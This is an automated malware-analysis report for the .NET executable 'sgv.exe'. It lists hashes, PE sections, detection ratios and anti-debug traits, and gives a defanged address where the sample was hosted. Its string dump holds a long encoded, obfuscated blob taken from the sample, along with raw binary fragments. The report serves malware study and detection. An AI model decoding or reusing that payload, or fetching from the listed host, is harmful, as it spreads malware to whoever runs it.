MalScore
100/100
MalFamily
Malicious

sgv.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 26/68 Related 2777
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 337.50 KB (345600 bytes)
Compile time: 2018-04-17 18:35:47
MD5: 8674e8fd878a92e92a479b931235bb72
SHA1: dfc652402b4791b81379326b0881cd0a2e613169
SHA256: 382204c078672bfae8b2c7f123e7cd735c3dd428f49446817973820cb0f2e5e3
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-04-18 21:30:03
Last submission: 2018-04-18 21:30:03
Filename detected: - sgv.exe (1)
URL file hosting
hXXp://23.249.161.109/zynova/sgv.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-18 00:03:16 [26/68] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x5544 22016 bdb401baa843ee1904732fbb5292b188 2c181cee2dffbe80cd257c37f00792c3053591d9
.rsrc 0x8000 0x4eaf6 322560 39a02fa69e66abf900cd9167fb97bac9 74848de46c244b7e089d3e7a7de19c3ab1d2c4e8
.reloc 0x58000 0xc 512 c3ecd7d3a1aec0b13529c72644181c3c 4f0013313dae59ee302cba815cd079d5ab3de8ff
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x13248 1128 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x136b0 132 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x13734 274903 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x5690c 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
No Meta found in this file
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
TPTBuQ05BU2ZLMG5DTm9BSTdnek5nMERJRjFHY2dRbmJwVm5DZ3NET3hBRE8xQVNQZzhtZDRCQ2R5OUdhelYzT3BBREswbEdlRjVDZHVWV2J1OW1jcFpuYkZCaUNnc3pNNEFDSTlBU2NUbEZJbFJYZWlwUUQ3bENLRmhuY2dRV2F2WkhJamxHYmlWSGM5cFFES0F5T3prak54VXpOeVVET3dZRE0yY3pNM2dESTlBQ2JObEdJbjUyYnNwQUk3Y1RONGtESTlBQ1VEQkZJMDVXYTF0VEtvaDBjb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJQ2JxbGtJZzBESW9oMGNnY21icEpIZHpwUUQ3bENLR0JuWWdRV2F2WkhJamxHYmlWSGM5cFFES0F5TzFFak0wRURJOUFDUlNSRUkwSjNib05YZDdrQ0tsNVdhTVJXWWxKbExseDJiejUyYkRCaUNnc1RNd0VUTGdBU1Bnb21RNEJTWjBsbll6dFRLaWdHYUZKQ0t6VkdkNUpFYnNGRVpoVm1VdVVHYnBaa0xQbGtMdFZHZHpsM1VnMERJb2hXUm9oV1JnMDFXbFJYZWlCaUNnc0RNeWd6TnkwQ0k5QUNhb1ZFSTBKM2JvTm5DTnNYS284MlR4QkNacDltZGdNV2FzSldkd3QzUmFORkl6TlhZc05HSWpsR2JpVkhjZzBuQzlwUUQ3a1NTWDVHS2w1V2FNVkdkcEozVnVVR2J2Tm5idk5FSUtBeU9pc2tRckpDSTlBU1NYNUdJbjVXYXlSM2M3a2lJTGhWZGlneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QXlTWVYzU1lWSElkdFZaMGxuWWdvQUk3UXpNNEFqTXRBU1Bnc0VXMUJDZHk5R2F6MW5DTnNETTVNRE4xQXlLZ0ltWVFCU1BnSW1ZUXBRRDdsU00wTXpNMFl6TTNZREk5MERJaUpHVW9VR2JwaDJkS0F5T3hRek16UWpOemNqTmcwRElpSkdVZ1FuYnBwUUQ3bENLS1pHVGdRV2F2WkhJamxHYmlWSGM5cFFES0F5T0dWek1yVWtOeEl6TTFVakwyMENJOUFpYVZOR0kwRjJic1pXZkswd09wMFZLeXdDTW9RSGVsNWtMQ2wxWW1aRmNMcG5SMWRrVU9WVlJiQm5SaUJGYUx4a1JFUlVTdVpYWk5WRmNDWjJiM3QwY2pGMWN1aFNadWxHVGxSWGF5ZGxMbHgyYno1MmJEcFFEN2tDS3Q5R1p1Rm1VZ2NYWnVCU1BDbDFZbVpGY0xwblIxZGtVT1ZWUmcwMmJrNVdZU3BRRDdBU2ZnVXpNd0VETmd3Q0l3UXpNeVVETTFBeWVnMERJd1prWVFoMlNNWkVSRWxrYjJWV1RWQm5RbTkyZExOM1lSTm5iZzAxVzA1V2FLMHdPS1psVFJGV2JKTmtWeDFrVnNkMFZHZFdWRWQzUlZOa2R5QjFaU0JTUGdja1NVcFFEN2tDTXhBQ0x3QURNeGd5WnZ4a0xvUlhZTkJTUGdva1ZPRlZZdGwwUVdGWFRXeDJSWFowWlZSMGRIVjFRMkpIVW5KRklseG1ZMTlHWkswd2VwWXpNdFVFT3lBek4wUWpMeUFTUDlBeVJLUkZLbHhXYW9kbkNnc0RPdzBTUnhNRE96WURNdUVESTlBeVJLUkZJbHhtWTE5R1o3a2lJSGhWU2lneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QXlSWWwwUllsRUlkdFZaMGxuWWdvQUk3TURPNU1ESTlBeVJZbEVJMEozYm9ObkNOc1hLb1VsVExCQ1pwOW1kZ01XYXNKV2R3MW5DTm9BSTdVRE14RVRNd2NUTndNRE55RVRNeVlUTWcwREl0NW1kZ2NtYnZ4bUNnc0RNM1VUTXdNVE56RWpNMVFETTVjRE54QVNQZ2NtU3VCeVp1OUdiOXBRRDdVRE4xa0ROM0FTUHJBU1dRbGtDTnNYS3lnREk5MERJWkJWU29VR2JwaDJkS0F5T3lnREk5QVNXUWxFSTA1V2FLMHdlcGdpZTZaRklrbDJiMkJ5WXB4bVkxQjNlalZsYWdNM2NoeDJZZ01XYXNKV2R3QlNmSzBuQ05vQUk3TWpNeWtESTlBaVFNdEdJMDVXYTF0VEtvVW1icHhFWmhWbVV1VUdidk5uYnZORUlLQXlPM0FDSTlBeVlXTkZJbFJYZWlObkNnc1RPd1F6TndZRE8wSVROMWdUTTNnak5nMERJdWgzYmdjbWJ2eG1DTnNYS29zVVRzQkNacDltZGdNV2FzSldkdzFuQ05zVEtRTkZVb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJaWJFWmtJZzBESVFORlVnY21icEpIZHpwQUk3Y2pOMkV6TWcwRElxVkVaZ1FuY3ZoMmMxMW5DTnNETXhjVE15SURJOUFDV01CbENOc1hLMU16TXhBU1A5QUNXTUJGS2x4V2FvZG5DZ3NUTnpNVE1nMERJWXhFVWdRbmJwcFFEN2xDS0ZWMlRnUVdhdlpISWpsR2JpVkhjOXBRRDdrQ01vUVhhNFZrTDA1V1p0NTJieWxtZHVWRUlLQXlPd01UTWdBU1BnSUZUSEJTWjBsblk5cFFEN2NETTRnRE41QVNQckFTVUJ0bUNOc1hLeGNETzNNRE9nMFRQZ0VWUXJoaVpwcEFJN1FUT2cwRElSRjBhZ1FuYnB0VEtRSmxhb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJQ2RUUmxJZzBESVFKbGFnY21icEpIZHpwUUQ3bENLaGhVUWdRV2F2WkhJamxHYmlWSGM3SkVlU0J5Y3pGR2JqQnlZcHhtWTFCWENLMFFDSzBRZmdBQ0lnb1FEOUJDSWdBQ0lnQUNJSzBRZmdBQ0lnQUNJZ0FDSWdBQ0lLMGdDTnNISWdBQ0lnQUNJZ0FDSWdBaUNOZzJZMEYyWWdBQ0lnQUNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQUNJZ0FDSUswd09wZ0NkeUZHZFQ1aWNvUlhDSmtRQ0swd09wY0VkSWxWYUhSMWFvTmtaR1ZYWkZKSEtrRldaeWhHVnVjbWJwUldZbEpIYVU1U2JsUjNjNU5GSTNWbWJnMERJeWhHZGdRV1lsSkhhVTV5WnVsR1poVm1jb1JsTHRWR2R6bDNVSmtRQ0pvUURKa1FDSm9RRDdrU0twdzBjTkZXZW9VMlpoMVdTeVVHZDVKRUt3MW1RdDltY0dSbmNsWm5idk5FS0Zsa1ZJSkZlcEJTUGd3MGNORldlSmtRQ0pvUUQ3a1NLbE5tYzE5MmNsSjFjb0l6TTA1V1N2UmxMMEpYWjI1MmJENVNibFIzYzVORklzQURJc3cwY05GV2Vnd1NaakpYZHZOWFpTUkdLNUIzYkQ1Q2JoaDJjeUZXVHVNWFpqbG1keVYyVXc5bWNsUm5iSjVTWnRsR2R1Vm5VdTBXWjBOWGVUbFFDSmtnQ05zVFhsTm1jMTkyY2xKMWNiVkdkNUpHSTNWbWJnMERJTU5YVGhsWENKa1FDSzBRQ0prUUNLMHdPcFUyWXlWM2J6Vm1Vc2hTWmpKWGR2TlhaU3QyWXZ4RUk5QVNaakpYZHZOWFpTUkdJeVJIVTA1V1NKa1FDSm9RRDdrU1pqSlhkdk5YWlNaR0lza0NNb0lIZFFSbmJKQnlkbDVHS2xObWMxOTJjbEpGWmg5R1RnMERJbE5tYzE5MmNsSkZiZ0lIZFFSbmJKbFFDSmtnQ05zVEtsTm1jMTkyY2xKbFpnd1NLd2dpYzBCRmR1bEVJM1ZtYm9VMll5VjNielZtVW05V1o2bDJVZzBESWxObWMxOTJjbEoxY2dRbmJwVlhDSmtRQ0swd09wa3lNeWdpYzBCRmR1bEVJM1ZtYmd3U0s0RVRNb0lIZFFSbmJKQnlkbDVHSXNrQ01vSUhkUVJuYkpCeWRsNUdLbE5tYzE5MmNsSkZadWxtUmcwRElsTm1jMTkyY2xKbFpnSUhkUVJuYkpsUUNKa2dDTmtRQzdCQ0lnQUNJZ0FDSWdBQ0lnb1FENUpIZGdBQ0lnQUNJZ0FDSWdBQ0lLMHdlZ0FDSWdBQ0lnQWlDTmtDS3VsV1lOQkNacDltZGdNV2EwRkdkekJDSWdBQ0lnQUNJSzBRQ0pvUUQ5QkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQUNJZ0FDSUswd09wMFdZbEpIZHpoQ2NoMUdkcEpFSTNWbWJnNG1jMVJYWnlCQ0lnQUNJZ0FDSWdBQ0lnQUNJZ0FpQ05zSElnQUNJZ0FDSWdBQ0lnQWlDTmtTS24xV2FvMFdZbEpIZFRsbmN2MVdaTkJ5ZGw1R0k5QVNiaFZtYzBOSEl5Rm1kb0F5WnVsMmMxQkNJZ0FDSWdBQ0lnQUNJZ29RRDdCQ0lnQUNJZ0FDSUswUUtuMVdhZzAxV2xSWGVpaFNabkZXYkpKVFowbG5RZ0FYWXRSWGFDQnlZcFJYWTBOSElqbEdiaVZIY0prZ0NOb1FESmtnQ05zVEtoUlhZRU5YWlNoR0l5UkhVMDVXU29VMll5VjNielZtVXJOMmJNQmljMEJGZHVsRUl1SlhaMGhYWmdNV2EwRkdkemxRQ0swUVhwSUNic1JtTHlNRGJsNW1jbHRtSW9RbmN2QlhiSnhHYkV0VkNKb1FESmtnQ05zVEt2Wm1iSk5YWlNoR0l5UkhVMDVXU2d3U1pzVkhadjFFYWdJSGRRUm5iSmhTWmpKWGR2TlhaU1JXWXZ4RUl5UkhVMDVXU2c0bWNsUkhlbEJ5WXBSWFkwTlhDSm9RRGRsU1oxSkhkOUkzYnlKWFIwTlhZTVJYWlRCQ0xpd0diazVpTXp3V1p1SlhackpDSzBKM2J3MVdTc3hHUmJsUUNLMFFDSm9RRDdreWJtNVdTelZtVW9CaWMwQkZkdWxFSXNVR2IxUjJiTmhHSXlSSFUwNVdTb1UyWXlWM2J6Vm1VbTlXWjZsMlVnUW5icFZISXVKWFowaFhaZ01XYTBGR2R6bFFDSzBRWHBVV2R5UlhQeTltY3lWRWR6RkdUMFYyVWd3aUlzeEdadUl6TXNWbWJ5VjJhaWdDZHk5R2N0bEVic1IwV0prZ0NOa1FDSzB3T3BVR2M1UkZjc0JpYzBCRmR1bEVJc1VXYmg1RWNzQmljMEJGZHVsRUlzVUdiMVIyYk5oR0l5UkhVMDVXU29VMll5VjNielZtVWs1V2FHQmljMEJGZHVsRUl1SlhaMGhYWmdNV2EwRkdkemxRQ0swUVhwSUNic1JtTHlNRGJsNW1jbHRtSW9RbmN2QlhiSnhHYkV0VkNKb1FESmtnQ04wWENKb1FEN2tTZmcwSEk3QlNYYmRtYnBKSGR6QnlkbDVHSTdCU1hiUjNZbHBtWXZCeWRsNUdJc3dHYjE1R0tsdDJiMjVXU3VRbmJwOUdVNUpIZHVWa0xwdzBjTkZXZW9RV1l2eGtMNXhtWXRWMmN6RlVDSmtnQ05zWENKb1FEcGd5UjBoVVdwZEVWcmgyUW1aVWRsVmtjZ1FXYXZaSElqbEdkaFIzY2dNV2FzSldkd2xRQ0swd09NTlhUaGxISWR0VlowbG5ZZ01XYTBGR2R6bFFDSzBRQ0pvUURKa2dDTjBISWdBQ0lnQUNJZ29RRDdZR0l1SlhkMFZtY2dBQ0lnQUNJZ0FDSWdBQ0lLMHdPcGdHZG41V1pNNWlaZ3dDTWd3aVpnd0NOZ3dpWm1Wbllva0hjdk4wYWo5R2JDNWljbFptWjFKRUlnQUNJZ0FDSWdBQ0lnQWlDTnNUWHVWR2JiVkdkNUpHSTNWbWJnMERJbUJTWGJWR2Q1SkdJZ0FDSWdBQ0lnQUNJZ0FpQ05zVEt3QUNMbVpXZGloaU16UW5iSjlHVnVJWFowSlhaMjUyYkRSWGFDQlNQZzRXWnNCQ2R1bEdJZ0FDSWdBQ0lnQUNJZ0FpQ05vUUQ5QkNJZ0FDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSWdBQ0lnQUNJZ0FpQ05zRE5nMHpLZ3NHSWdBQ0lnQUNJZ0FDSWdBQ0lnQUNJZ0FDSWdvUUQ3a0NOZ3d5YWd3aVptVm5ZZ3dDTWd3U0twZ2lZbkpYUXZSbExwa0hJc2dIS3NWR2VwQkZkbGRrTGloeWNsUlhlQ1JYWkg1aWNsUm5jbFpuYnZORWRwSkVLNUIzYkR0Mll2eG1RdUlYWm1aV2RDQkNJZ0FDSWdBQ0lnQUNJZ0FDSWdBQ0lnQUNJSzB3ZWdBQ0lnQUNJZ0FDSWdBQ0lnQUNJZ29RRHBzeUs1QnlPc0JDUGdrSEk3QURJOUFTZWdRbmJwaENJeTltWmdBQ0lnQUNJZ0FDSWdBQ0lnQUNJZ29RRDdCQ0lnQUNJZ0FDSWdBQ0lnb1FEcHN5SzRCeU9zQkNQZ2dISTdBREk5QUNlZ1FuYnBoQ0l5OW1aZ0FDSWdBQ0lnQUNJZ0FDSUswZ0NOc0RNZzBESXJCQ2R1bEdJZ0FDSWdBQ0lnQUNJZ0FpQ05zVFh1dFZaMGxuWWdjWFp1QlNQZ1ltWjFKR0lkdFZaMGxuWWdBQ0lnQUNJZ0FDSWdBQ0lLMHdPMEFpS2d3R0lxQUNiZzBESXVCQ2R1bEdJZ0FDSWdBQ0lnQUNJZ0FpQ05zRGEwUldhWDVpWWcwRElzQkNkdWxHSWdBQ0lnQUNJZ0FDSWdBaUNOc0hJZ0FDSWdBQ0lnb1FEcElHSXdGV2IwbG1RdWNtYnBkWFl5UmtMdFZHZHpsM1VvQVhiQzEyYnlaRWR5Vm1kdTkyUWcwMVdsUlhlaUJ5WXBSWFkwTkhJbFJYWTJsbWN3bFFDSzBRQ0pvUUQ5QkNJZ0FDSWdBQ0lLMHdPelZHZDVKR0l1SlhkMFZtY2dBQ0lnQUNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQUNJZ0FDSUswd09kWlRNZ1VDSXB0VmVoSm5jQlZHZDVKR0k5NEZJZGwyV3pWR2Q1SkdJZ0FDSWdBQ0lnQUNJZ0FDSWdBQ0lLMHdlZ0FDSWdBQ0lnQUNJZ0FDSUswUUtyc1NhZ3NEYTBkbWJseGtMelZHZDVKR0k4QVNhZ3NETWcwRElwQkNkdWxHS2dJM2JtQkNJZ0FDSWdBQ0lnQUNJZ29RRDdrQ1JJQkhiVUJuYTJsRVdEUm1jb01YWjBsblEwVjJSdVVHWnZOV2F1VmxMbjVXYWs5Mll1VkVJOUFTZWhKbmNCVkdkNUpHSWR0VlowbG5ZZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnQUNJZ0FDSWdBaUNOa3ljbFJYZWlCU1hiVkdkNUpHS0Zsa1ZJSkZlcEJTWGJWR2Q1SkdJamxHZGhSM2NnVUdkaFpYYXlCSElnQUNJZ0FDSWdvUUQ3SXlJek5YWXdOaUlnMERJRWhFY3NSRmNxWlhTWU5FWnlCeVp1bG1jME5ISWpsR2RoUjNjZ0FDSWdBQ0lnQWlDTm9RRDdCQ0lnQWlDTjBXWXlkMmJ5QkZJek5YWXNOR0lnQUNJSzBnQ05BU2ZLMG5DTm9BSTdnek5nMERJMnBHWmdRbmJwVm5DZ3NET3hBRE8xQVNQZ3dVVnBCQ2R5OUdhelYzT3BBREswbEdlRjVDZHVWV2J1OW1jcFpuYkZCaUNnc3pNNEFDSTlBU1lDRkZJbFJYZWlwUUQ3bENLSVpIVmdRV2F2WkhJamxHYmlWSGM5cFFES0F5T3prak54VXpOeVVET3dZRE0yY3pNM2dESTlBU1psOUdJbjUyYnNwQUk3Y1RONGtESTlBeVJ2UkVJMDVXYTF0VEtOaGxlb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJQ1RIZGtJZzBESU5obGVnY21icEpIZHpwUUQ3bENLT0ZGYmdRV2F2WkhJamxHYmlWSGM5cFFES0F5TzFFak0wRURJOUFTUnNoRUkwSjNib05YZDdrQ0tsNVdhTVJXWWxKbExseDJiejUyYkRCaUNnc1RNd0VUTGdBU1Bnc2taUkJTWjBsbll6dFRLaU0wVG9KQ0t6VkdkNUpFYnNGRVpoVm1VdVVHYnBaa0xQbGtMdFZHZHpsM1VnMERJRDlFYUQ5RWFnMDFXbFJYZWlCaUNnc0RNeWd6TnkwQ0k5QXlRUGhHSTBKM2JvTm5DTnNYS29JbVNhQkNacDltZGdNV2FzSldkd3RIYVZsRUl6TlhZc05HSWpsR2JpVkhjZzBuQzlwUUQ3a0NXWUZFS2w1V2FNVkdkcEozVnVVR2J2Tm5idk5FSUtBeU9pYzBiQkpDSTlBQ1dZRkVJbjVXYXlSM2M3a2lJaHgwY2lneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QVNZTU5YWU1OSElkdFZaMGxuWWdvQUk3UXpNNEFqTXRBU1BnRUdUekJDZHk5R2F6MW5DTnNETTVNRE4xQXlLZ1UxVHdCU1BnVTFUd3BRRDdsU00wTXpNMFl6TTNZREk5MERJVjlFY29VR2JwaDJkS0F5T3hRek16UWpOemNqTmcwRElWOUVjZ1FuYnBwUUQ3bENLUjlFVWdRV2F2WkhJamxHYmlWSGM5cFFES0F5T0dWek1yVWtOeEl6TTFVakwyMENJOUFpZEtsRUkwRjJic1pXZkswd09wMFZLeXdDTW9RSGVsNWtMekoxUXFKWFkzWkdhdUJGWmpaRVNiRlZkUmRrYWlWMFZ5ZGtheGRYWXlObGJScG1jQ1YzVFlabGVqaFNadWxHVGxSWGF5ZGxMbHgyYno1MmJEcFFEN2tDS3Q5R1p1Rm1VZ2NYWnVCU1B6SjFRcUpYWTNaR2F1QkZaalpFU2cwMmJrNVdZU3BRRDdBU2ZnVXpNd0VETmd3Q0l3UXpNeVVETTFBeWVnMERJUlZYVUhwbVlGZGxjSHBXYzNGbWNUNVdVcUpuUTE5RVdXcDNZZzAxVzA1V2FLMHdPaHAzUlRkMFUzcFhUQkprZEJoVVN0aFhjR05WWXpCM1ltbDNVQ0JTUGc4V2VXcFFEN2tDTXhBQ0x3QURNeGd5WnZ4a0xvUlhZTkJTUGdFbWVITjFSVGRuZU5Ga1EyRkVTSjFHZXhaMFVoTkhjalpXZVRKRUlseG1ZMTlHWkswd2VwWXpNdFVFT3lBek4wUWpMeUFTUDlBeWI1WkZLbHhXYW9kbkNnc0RPdzBTUnhNRE96WURNdUVESTlBeWI1WkZJbHhtWTE5R1o3a2lJNkZXVmlneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QWllaFZsZWhWRklkdFZaMGxuWWdvQUk3TURPNU1ESTlBaWVoVkZJMEozYm9ObkNOc1hLb01tUWtCQ1pwOW1kZ01XYXNKV2R3MW5DTm9BSTdVRE14RVRNd2NUTndNRE55RVRNeVlUTWcwRElKNVdWZ2NtYnZ4bUNnc0RNM1VUTXdNVE56RWpNMVFETTVjRE54QVNQZ1EyWm5CeVp1OUdiOXBRRDdVRE4xa0ROM0FTUHJBQ1YwRm1DTnNYS3lnREk5MERJVVJYWW9VR2JwaDJkS0F5T3lnREk5QUNWMEZHSTA1V2FLMHdlcGdTYVdGR0lrbDJiMkJ5WXB4bVkxQjNlSGQzUmdNM2NoeDJZZ01XYXNKV2R3QlNmSzBuQ05vQUk3TWpNeWtESTlBeVF5MUdJMDVXYTF0VEtvVW1icHhFWmhWbVV1VUdidk5uYnZORUlLQXlPM0FDSTlBU2JZdEVJbFJYZWlObkNnc1RPd1F6TndZRE8wSVROMWdUTTNnak5nMERJbzFXYmdjbWJ2eG1DTnNYS29ZVlRLQkNacDltZGdNV2FzSldkdzFuQ05zVEt1ZGxab1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJaVM1eG1JZzBESXVkbFpnY21icEpIZHpwQUk3Y2pOMkV6TWcwREl6RjFWZ1FuY3ZoMmMxMW5DTnNETXhjVE15SURJOUFpUnZabkNOc1hLMU16TXhBU1A5QWlSdlpIS2x4V2FvZG5DZ3NUTnpNVE1nMERJRzltZGdRbmJwcFFEN2xDSzBKVWRnUVdhdlpISWpsR2JpVkhjOXBRRDdrQ01vUVhhNFZrTDA1V1p0NTJieWxtZHVWRUlLQXlPd01UTWdBU1BnTUhSbkJTWjBsblk5cFFEN2NETTRnRE41QVNQckF5WW5CbkNOc1hLeGNETzNNRE9nMFRQZ00yWndoaVpwcEFJN1FUT2cwRElqZEdjZ1FuYnB0VEswaFVib1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJU2FYeGtJZzBESTBoVWJnY21icEpIZHpwUUQ3bENLU2xIVWdRV2F2WkhJamxHYmlWSGM3UmtSVkJ5Y3pGR2JqQnlZcHhtWTFCWENLMHdlSzBnZHB0VWQ2bEhTWFJrWTJWSElsTldZd05YWnRGbWJLMGdDTnN6WnVsMmRoSkhSdTBXWjBOWGVUQnladWwyYzFwUUQ3TVhaamxtZHlWMlV3OW1jbFJuYko1U1p0bEdkdVZuVXUwV1owTlhlVEJ5WnVsMmMxcFFEN2NtYnBSV1lsSkhhVTVTYmxSM2M1TkZJbjVXYXpWbkNOc2pidmxHZGpWR2JtVm1VdTBXWjBOWGVUQnladWwyYzFwUUQ3UUhlbFJsTHRWR2R6bDNVZ2NtYnBOWGRLMHdPUGxrTHRWR2R6bDNVZ2NtYnBOWGRLMHdPdFZHZHpsM1VnY21icE5YZA==
RGVidWdnZXIgZGV0ZWN0ZWQgIQ== UlNSQ05BTUU= UlNSQ1BXRA==4QyMgdmVyc2lvbiBvbmx5IHN1cHBvcnRzIGxldmVsIDEgYW5kIDM=hVGhpcyBwcm9ncmFtIGhhcyBiZWVuIHByb3RlY3RlZCBieSBhbiBldmFsdWF0aW9uIHZlcnNpb24gb2YgRG90d2FsbCBPYmZ1c2NhdG9y
 
(-KOUc
OnC8qmXM4AXQxRWY
-#z@
5<3
@h,q
XQcl
]{:F
K]=
5	y;wk
wLG+S~i
3qUG
*|
:
lX4?
lT';;[
2][1 .
}CC
PNG
RTYHx
Dt36
iG/u<A\Bn9
JY-K
N#4n
grB&g
C|Wp!
@]O&
#`#j
Yy]^

)n9:4
>K
Vy=
bFVT
bcGp|<
rv}YW
3 >B
wksp9v8d
\A>|
|=z5
jD?
=0azH
X^Tf
z
1tV[
@<6
&
(('
;nQ)
ResolveEventHandler
BIh
Ec

=
x:l(gw
TPTBuQ05BU2ZLMG5DTm9BSTdnek5nMERJRjFHY2dRbmJwVm5DZ3NET3hBRE8xQVNQZzhtZDRCQ2R5OUdhelYzT3BBREswbEdlRjVDZHVWV2J1OW1jcFpuYkZCaUNnc3pNNEFDSTlBU2NUbEZJbFJYZWlwUUQ3bENLRmhuY2dRV2F2WkhJamxHYmlWSGM5cFFES0F5T3prak54VXpOeVVET3dZRE0yY3pNM2dESTlBQ2JObEdJbjUyYnNwQUk3Y1RONGtESTlBQ1VEQkZJMDVXYTF0VEtvaDBjb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJQ2JxbGtJZzBESW9oMGNnY21icEpIZHpwUUQ3bENLR0JuWWdRV2F2WkhJamxHYmlWSGM5cFFES0F5TzFFak0wRURJOUFDUlNSRUkwSjNib05YZDdrQ0tsNVdhTVJXWWxKbExseDJiejUyYkRCaUNnc1RNd0VUTGdBU1Bnb21RNEJTWjBsbll6dFRLaWdHYUZKQ0t6VkdkNUpFYnNGRVpoVm1VdVVHYnBaa0xQbGtMdFZHZHpsM1VnMERJb2hXUm9oV1JnMDFXbFJYZWlCaUNnc0RNeWd6TnkwQ0k5QUNhb1ZFSTBKM2JvTm5DTnNYS284MlR4QkNacDltZGdNV2FzSldkd3QzUmFORkl6TlhZc05HSWpsR2JpVkhjZzBuQzlwUUQ3a1NTWDVHS2w1V2FNVkdkcEozVnVVR2J2Tm5idk5FSUtBeU9pc2tRckpDSTlBU1NYNUdJbjVXYXlSM2M3a2lJTGhWZGlneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QXlTWVYzU1lWSElkdFZaMGxuWWdvQUk3UXpNNEFqTXRBU1Bnc0VXMUJDZHk5R2F6MW5DTnNETTVNRE4xQXlLZ0ltWVFCU1BnSW1ZUXBRRDdsU00wTXpNMFl6TTNZREk5MERJaUpHVW9VR2JwaDJkS0F5T3hRek16UWpOemNqTmcwRElpSkdVZ1FuYnBwUUQ3bENLS1pHVGdRV2F2WkhJamxHYmlWSGM5cFFES0F5T0dWek1yVWtOeEl6TTFVakwyMENJOUFpYVZOR0kwRjJic1pXZkswd09wMFZLeXdDTW9RSGVsNWtMQ2wxWW1aRmNMcG5SMWRrVU9WVlJiQm5SaUJGYUx4a1JFUlVTdVpYWk5WRmNDWjJiM3QwY2pGMWN1aFNadWxHVGxSWGF5ZGxMbHgyYno1MmJEcFFEN2tDS3Q5R1p1Rm1VZ2NYWnVCU1BDbDFZbVpGY0xwblIxZGtVT1ZWUmcwMmJrNVdZU3BRRDdBU2ZnVXpNd0VETmd3Q0l3UXpNeVVETTFBeWVnMERJd1prWVFoMlNNWkVSRWxrYjJWV1RWQm5RbTkyZExOM1lSTm5iZzAxVzA1V2FLMHdPS1psVFJGV2JKTmtWeDFrVnNkMFZHZFdWRWQzUlZOa2R5QjFaU0JTUGdja1NVcFFEN2tDTXhBQ0x3QURNeGd5WnZ4a0xvUlhZTkJTUGdva1ZPRlZZdGwwUVdGWFRXeDJSWFowWlZSMGRIVjFRMkpIVW5KRklseG1ZMTlHWkswd2VwWXpNdFVFT3lBek4wUWpMeUFTUDlBeVJLUkZLbHhXYW9kbkNnc0RPdzBTUnhNRE96WURNdUVESTlBeVJLUkZJbHhtWTE5R1o3a2lJSGhWU2lneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QXlSWWwwUllsRUlkdFZaMGxuWWdvQUk3TURPNU1ESTlBeVJZbEVJMEozYm9ObkNOc1hLb1VsVExCQ1pwOW1kZ01XYXNKV2R3MW5DTm9BSTdVRE14RVRNd2NUTndNRE55RVRNeVlUTWcwREl0NW1kZ2NtYnZ4bUNnc0RNM1VUTXdNVE56RWpNMVFETTVjRE54QVNQZ2NtU3VCeVp1OUdiOXBRRDdVRE4xa0ROM0FTUHJBU1dRbGtDTnNYS3lnREk5MERJWkJWU29VR2JwaDJkS0F5T3lnREk5QVNXUWxFSTA1V2FLMHdlcGdpZTZaRklrbDJiMkJ5WXB4bVkxQjNlalZsYWdNM2NoeDJZZ01XYXNKV2R3QlNmSzBuQ05vQUk3TWpNeWtESTlBaVFNdEdJMDVXYTF0VEtvVW1icHhFWmhWbVV1VUdidk5uYnZORUlLQXlPM0FDSTlBeVlXTkZJbFJYZWlObkNnc1RPd1F6TndZRE8wSVROMWdUTTNnak5nMERJdWgzYmdjbWJ2eG1DTnNYS29zVVRzQkNacDltZGdNV2FzSldkdzFuQ05zVEtRTkZVb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJaWJFWmtJZzBESVFORlVnY21icEpIZHpwQUk3Y2pOMkV6TWcwRElxVkVaZ1FuY3ZoMmMxMW5DTnNETXhjVE15SURJOUFDV01CbENOc1hLMU16TXhBU1A5QUNXTUJGS2x4V2FvZG5DZ3NUTnpNVE1nMERJWXhFVWdRbmJwcFFEN2xDS0ZWMlRnUVdhdlpISWpsR2JpVkhjOXBRRDdrQ01vUVhhNFZrTDA1V1p0NTJieWxtZHVWRUlLQXlPd01UTWdBU1BnSUZUSEJTWjBsblk5cFFEN2NETTRnRE41QVNQckFTVUJ0bUNOc1hLeGNETzNNRE9nMFRQZ0VWUXJoaVpwcEFJN1FUT2cwRElSRjBhZ1FuYnB0VEtRSmxhb1VtYnB4VVowbG1jWDVTWnM5M